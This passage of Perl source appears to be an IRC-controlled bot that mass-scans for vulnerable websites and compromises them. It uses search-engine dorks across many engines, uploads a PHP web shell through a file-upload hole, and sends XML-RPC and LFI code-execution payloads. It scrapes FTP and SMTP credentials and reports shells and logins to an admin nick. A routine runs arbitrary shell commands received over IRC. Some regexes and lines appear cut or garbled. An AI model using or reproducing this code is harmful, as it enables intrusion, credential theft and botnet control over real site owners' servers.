$ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; my $smtphost = ""; my $smtpuser = ""; my $smtppass = ""; my $smtpauth = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$ftp_enable = '(.+?)';/i){$ftpopen=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$smtpauth = '(.+?)';/i){$smtpauth=$1;} &msg("$chan","$rcilogo4$engine 4<9=4>9 Target Sent To 4<9=4>9 $nick4 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { &msg("$admin","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$nick","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } if ($smtpauth =~ /1/) { &msg("$chan","4,1 [8SMTP4] Found on 8http://$site "); &msg("$admin","4,1 [8SMTP4] [ 8host : ".$smtphost." 4] [ 8login : ".$smtpuser." 4] [ 8pass : ".$smtppass." 4]"); } if ($ftpopen =~ /1/){ my $hozt = $site; $hozt =~ s/\///; &ftp($hozt,$ftpuser,$ftppass,$chan); } } } } exit; } } if ($count == $num-1) { &msg("$chan","$rcilogo4$engine 9Finished 4for 9$dork "); if ($engine =~ /UoL/) { &sendraw("mode $chan -m"); } } } } } sub rci_upload() { my $success = 0; my $url = $_[0]; my $ua = LWP::UserAgent->new; my $data = " "; my $res = $ua->request(POST $url,Content_Type => 'text/plain', Content => $data); if ($res->is_success){ $success = 1; } return $success; } sub cgm_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$cgmlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$cgmlogo4$engine 9Finished 4for 9$dork "); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http://".$site.$bugz,['qqfile' => ['./xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); my $hasil = $res->content; my $path = "wp-content/2013/10/xxx.php"; if ($hasil=~ /xxx.php/){ &msg("$chan","$cgmlogo4$engine 9e3x9p3l9o3i9t3i9n3g 4http://$site "); my $test = "http://".$site.$path; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test); if ($cekap =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$cgmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$cgmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); } } exit; } } } } } ################################################################################## sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "JacKAE") { my @jackae = &jack($dork."+Kontakt",$jackae); push(@total,@jackae); } if ($engine eq "JacKAR") { my @jackar = &jack($dork."+Produkt",$jackar); push(@total,@jackar); } if ($engine eq "JacKAT") { my @jackat = &jack($dork."+Domain",$jackat); push(@total,@jackat); } if ($engine eq "JacKAU") { my @jackau = &jack($dork."+Joomla",$jackau); push(@total,@jackau); } if ($engine eq "JacKBR") { my @jackbr = &jack($dork."+CMS",$jackbr); push(@total,@jackbr); } if ($engine eq "JacKCA") { my @jackca = &jack($dork."+Contact",$jackca); push(@total,@jackca); } if ($engine eq "JacKCL") { my @jackcl = &jack($dork."+Content",$jackcl); push(@total,@jackcl); } if ($engine eq "JacKCN") { my @jackcn = &jack($dork."+Preise",$jackcn); push(@total,@jackcn); } if ($engine eq "JacKCoM") { my @jackcom = &jack($dork."+Galerie",$jackcom); push(@total,@jackcom); } if ($engine eq "JacKCZ") { my @jackcz = &jack($dork."+Fotos",$jackcz); push(@total,@jackcz); } if ($engine eq "JacKDE") { my @jackde = &jack($dork."+Impressum",$jackde); push(@total,@jackde); } if ($engine eq "JacKDK") { my @jackdk = &jack($dork."+lang=de",$jackdk); push(@total,@jackdk); } if ($engine eq "JacKES") { my @jackes = &jack($dork."+Itemid",$jackes); push(@total,@jackes); } if ($engine eq "JacKEU") { my @jackeu = &jack($dork."+lang=en",$jackeu); push(@total,@jackeu); } if ($engine eq "JacKFR") { my @jackfr = &jack($dork."+Catalog",$jackfr); push(@total,@jackfr); } if ($engine eq "JacKHU") { my @jackhu = &jack($dork."+Empresa",$jackhu); push(@total,@jackhu); } if ($engine eq "JacKID") { my @jackid = &jack($dork."+Noticias",$jackid); push(@total,@jackid); } if ($engine eq "JacKIL") { my @jackil = &jack($dork."+Shop",$jackil); push(@total,@jackil); } if ($engine eq "JacKIN") { my @jackin = &jack($dork."+Admin",$jackin); push(@total,@jackin); } if ($engine eq "JacKInfO") { my @jackinfo = &jack($dork."+Articles",$jackinfo); push(@total,@jackinfo); } if ($engine eq "JacKIR") { my @jackir = &jack($dork."+Producten",$jackir); push(@total,@jackir); } if ($engine eq "JacKIT") { my @jackit = &jack($dork."+AGB",$jackit); push(@total,@jackit); } if ($engine eq "JacKJP") { my @jackjp = &jack($dork."+Presse",$jackjp); push(@total,@jackjp); } if ($engine eq "JacKKR") { my @jackkr = &jack($dork."+Accueil",$jackkr); push(@total,@jackkr); } if ($engine eq "JacKMX") { my @jackmx = &jack($dork."+Gallery",$jackmx); push(@total,@jackmx); } if ($engine eq "JacKMY") { my @jackmy = &jack($dork."+Fotos",$jackmy); push(@total,@jackmy); } if ($engine eq "JacKNeT") { my @jacknet = &jack($dork."+Photos",$jacknet); push(@total,@jacknet); } if ($engine eq "JacKNL") { my @jacknl = &jack($dork."+Katalog",$jacknl); push(@total,@jacknl); } if ($engine eq "JacKOrG") { my @jackorg = &jack($dork."+Loja",$jackorg); push(@total,@jackorg); } if ($engine eq "JacKPH") { my @jackph = &jack($dork."+Contacto",$jackph); push(@total,@jackph); } if ($engine eq "JacKPL") { my @jackpl = &jack($dork."+Copyright ©",$jackpl); push(@total,@jackpl); } if ($engine eq "JacKRO") { my @jackro = &jack($dork."+site:by",$jackro); push(@total,@jackro); } if ($engine eq "JacKRU") { my @jackru = &jack($dork."+Images",$jackru); push(@total,@jackru); } if ($engine eq "JacKTH") { my @jackth = &jack($dork."+index",$jackth); push(@total,@jackth); } if ($engine eq "JacKUA") { my @jackua = &jack($dork."+Strona",$jackua); push(@total,@jackua); } if ($engine eq "JacKUK") { my @jackuk = &jack($dork."+Produkty",$jackuk); push(@total,@jackuk); } if ($engine eq "JacKUS") { my @jackus = &jack($dork."+About",$jackus); push(@total,@jackus); } if ($engine eq "JacKSI") { my @jacksi = &jack($dork."+Contenido",$jacksi); push(@total,@jacksi); } if ($engine eq "JacKBE") { my @jackbe = &jack($dork."+StartSeite",$jackbe); push(@total,@jackbe); } if ($engine eq "JacKBIZ") { my @jackbiz = &jack($dork."+Frontpage",$jackbiz); push(@total,@jackbiz); } if ($engine eq "jackBY") { my @jackby = &jack($dork."+site:com",$jackby); push(@total,@jackby); } if ($engine eq "jackMA") { my @jackma = &jack($dork."+site:net",$jackma); push(@total,@jackma); } if ($engine eq "JacKBA") { my @jackba = &jack($dork."+site:org",$jackba); push(@total,@jackba); } if ($engine eq "JacKAL") { my @jackal = &jack($dork."+site:de",$jackal); push(@total,@jackal); } if ($engine eq "JacKCH") { my @jackch = &jack($dork."+site:nl",$jackch); push(@total,@jackch); } if ($engine eq "JacKLu") { my @jacklu = &jack($dork."+site:ru",$jacklu); push(@total,@jacklu); } if ($engine eq "JacKWS") { my @jackws = &jack($dork."+site:au",$jackws); push(@total,@jackws); } if ($engine eq "JacKDO") { my @jackdo = &jack($dork."+site:uk",$jackdo); push(@total,@jackdo); } if ($engine eq "JacKR1") { my @jackr1 = &jack($dork."+page",$jackr1); push(@total,@jackr1); } if ($engine eq "JacKR2") { my @jackr2 = &jack($dork."+admin",$jackr2); push(@total,@jackr2); } if ($engine eq "jackR3") { my @jackr3 = &jack($dork."+www",$jackr3); push(@total,@jackr3); } if ($engine eq "jackR4") { my @jackr4 = &jack($dork."+users",$jackr4); push(@total,@jackr4); } if ($engine eq "JacKR5") { my @jackr5 = &jack($dork."+domain",$jackr5); push(@total,@jackr5); } if ($engine eq "JacKR6") { my @jackr6 = &jack($dork."+kunden",$jackr6); push(@total,@jackr6); } if ($engine eq "JacKR7") { my @jackr7 = &jack($dork."+welcome",$jackr7); push(@total,@jackr7); } if ($engine eq "JacKR8") { my @jackr8 = &jack($dork."+?id=",$jackr8); push(@total,@jackr8); } if ($engine eq "JacKR9") { my @jackr9 = &jack($dork."+FAQ",$jackr9); push(@total,@jackr9); } if ($engine eq "JacK10") { my @jackr10 = &jack($dork."+login",$jackr10); push(@total,@jackr10); } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); } if ($engine eq "GooGLeCA") { my @googleCA = googleCA($dork); push(@total,@googleCA); } if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@total,@googleDE); } if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@total,@googleUK); } if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@total,@googleFR); } if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@total,@googleES); } if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@total,@googleIT); } if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@total,@googleNL); } if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@total,@googleBE); } if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@total,@googleDK); } if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@total,@googleNO); } if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@total,@googleNZ); } if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@total,@googleIE); } if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@total,@googleBR); } if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@total,@googleAR); } if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@total,@googleCO); } if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@total,@googleCU); } if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@total,@googleCL); } if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@total,@googleMX); } if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@total,@googleAU); } if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@total,@googleRU); } if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@total,@googleAT); } if ($engine eq "GooGLePL") { my @googlePL = googlePL($dork); push(@total,@googlePL); } if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@total,@googleIL); } if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@total,@googleTR); } if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@total,@googleUA); } if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@total,@googleGR); } if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@total,@googleJP); } if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@total,@googleCN); } if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@total,@googleMY); } if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@total,@googleTH); } if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@total,@googleIN); } if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@total,@googleKR); } if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@total,@googleRO); } if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@total,@googleTW); } if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@total,@googleZA); } if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@total,@googlePT); } if ($engine eq "GooGLeBY") { my @googleBY = googleBY($dork); push(@total,@googleBY); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "YahOoCA") { my @yahooCA = yahooCA($dork); push(@total,@yahooCA); } if ($engine eq "YahOoUK") { my @yahooUK = yahooUK($dork); push(@total,@yahooUK); } if ($engine eq "YahOoDE") { my @yahooDE = yahooDE($dork); push(@total,@yahooDE); } if ($engine eq "YahOoFR") { my @yahooFR = yahooFR($dork); push(@total,@yahooFR); } if ($engine eq "YahOoES") { my @yahooES = yahooES($dork); push(@total,@yahooES); } if ($engine eq "YahOoIT") { my @yahooIT = yahooIT($dork); push(@total,@yahooIT); } if ($engine eq "YahOoHK") { my @yahooHK = yahooHK($dork); push(@total,@yahooHK); } if ($engine eq "YahOoID") { my @yahooID = yahooID($dork); push(@total,@yahooID); } if ($engine eq "YahOoIN") { my @yahooIN = yahooIN($dork); push(@total,@yahooIN); } if ($engine eq "YahOoAU") { my @yahooAU = yahooAU($dork); push(@total,@yahooAU); } if ($engine eq "YahOoMX") { my @yahooMX = yahooMX($dork); push(@total,@yahooMX); } if ($engine eq "YahOoTW") { my @yahooTW = yahooTW($dork); push(@total,@yahooTW); } if ($engine eq "YahOoBR") { my @yahooBR = yahooBR($dork); push(@total,@yahooBR); } if ($engine eq "YahOoAR") { my @yahooAR = yahooAR($dork); push(@total,@yahooAR); } if ($engine eq "YahOoNL") { my @yahooNL = yahooNL($dork); push(@total,@yahooNL); } if ($engine eq "YahOoDK") { my @yahooDK = yahooDK($dork); push(@total,@yahooDK); } if ($engine eq "YahOoPH") { my @yahooPH = yahooPH($dork); push(@total,@yahooPH); } if ($engine eq "YahOoCL") { my @yahooCL = yahooCL($dork); push(@total,@yahooCL); } if ($engine eq "YahOoRU") { my @yahooRU = yahooRU($dork); push(@total,@yahooRU); } if ($engine eq "YahOoCH") { my @yahooCH = yahooCH($dork); push(@total,@yahooCH); } if ($engine eq "YahOoCO") { my @yahooCO = yahooCO($dork); push(@total,@yahooCO); } if ($engine eq "YahOoFI") { my @yahooFI = yahooFI($dork); push(@total,@yahooFI); } if ($engine eq "YahOoRO") { my @yahooRO = yahooRO($dork); push(@total,@yahooRO); } if ($engine eq "YahOoVE") { my @yahooVE = yahooVE($dork); push(@total,@yahooVE); } if ($engine eq "YahOoAT") { my @yahooAT = yahooAT($dork); push(@total,@yahooAT); } if ($engine eq "YahOoPL") { my @yahooPL = yahooPL($dork); push(@total,@yahooPL); } if ($engine eq "YahOoKR") { my @yahooKR = yahooKR($dork); push(@total,@yahooKR); } if ($engine eq "YahOoNZ") { my @yahooNZ = yahooNZ($dork); push(@total,@yahooNZ); } if ($engine eq "YahOoGR") { my @yahooGR = yahooGR($dork); push(@total,@yahooGR); } if ($engine eq "YahOoPE") { my @yahooPE = yahooPE($dork); push(@total,@yahooPE); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@total,@askCA); } if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@total,@askDE); } if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@total,@askIT); } if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@total,@askUK); } if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@total,@askFR); } if ($engine eq "AsKES") { my @askES = askES($dork); push(@total,@askES); } if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@total,@askRU); } if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@total,@askNL); } if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@total,@askEU); } if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@total,@askPL); } if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@total,@askAT); } if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@total,@askSE); } if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@total,@askDK); } if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@total,@askNO); } if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@total,@askAU); } if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@total,@askBR); } if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@total,@askMX); } if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@total,@askJP); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@total,@bingDE); } if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@total,@bingUK); } if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@total,@bingCA); } if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@total,@bingBR); } if ($engine eq "BingFR") { my @bingFR = bingFR($dork); push(@total,@bingFR); } if ($engine eq "BingES") { my @bingES = bingES($dork); push(@total,@bingES); } if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@total,@bingIT); } if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@total,@bingBE); } if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@total,@bingNL); } if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@total,@bingPT); } if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@total,@bingNO); } if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@total,@bingDK); } if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@total,@bingSE); } if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@total,@bingCH); } if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@total,@bingNZ); } if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@total,@bingRU); } if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@total,@bingJP); } if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@total,@bingCN); } if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@total,@bingKR); } if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@total,@bingMX); } if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@total,@bingAR); } if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@total,@bingCL); } if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@total,@bingAU); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); } if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); } @clean = &clean(@total); if ($silentmode == 0) { &msg("$chan","$logo9$engine 4<9*0>9 Total:1 [0".scalar(@total)."0] 9 Clean:0 [0".scalar(@clean)."0] "); } return @clean; } ################################################################################## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } ######################################### SEARCH ENGINE sub jack() { my @list; my $key = $_[0]; my $jackx = $_[1]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jackx.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/
/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=300; $b+=20) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=300; $b+=10) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=10) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = &search_engine_query($search); while ( $res =~ m/new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; my $sget = "GET $query HTTP/1.0\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Accept: */*\r\n"; $sget .= "User-Agent: $uagent\r\n"; $sget .= "Connetion: Close\r\n\r\n"; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub cmdlfi() { my $browser = LWP::UserAgent->new; my $url = $_[0]; my $cmd = $_[1]; my $chan = $_[2]; my $hie = "lobex /dev/stdout\"); ?>byroe"; $browser->agent("$hie"); $browser->timeout(7); $response = $browser->get( $url ); if ($response->content =~ /lobex(.*)byroe/s) { &msg("$chan","$lfilogo9 ".$1." "); } else { &msg("$chan","$lfilogo4 No Output "); } } sub cmdxml() { my $jed = $_[0]; my $dwa = $_[1]; my $chan = $_[2]; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*"; my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit); if ($response->content =~ /bamby(.*)solo/s) { &msg("$chan","$xmllogo9 $1 "); } else { &msg("$chan","$xmllogo4 No Output "); } } sub read_dorks() { my $dork = uri_escape($_[0]); my $file = "dorks.txt"; my $success = 0; open (file,"<$file"); while (my $dorkx=) { chop($dorkx); if ($dorkx =~ /$dork/){ $success = 1; } } close file; return $success; } sub write_dorks() { my $dorks = uri_escape($_[0]); my $file = "dorks.txt"; open (filex,">>$file"); print filex $dorks."\n"; close filex; }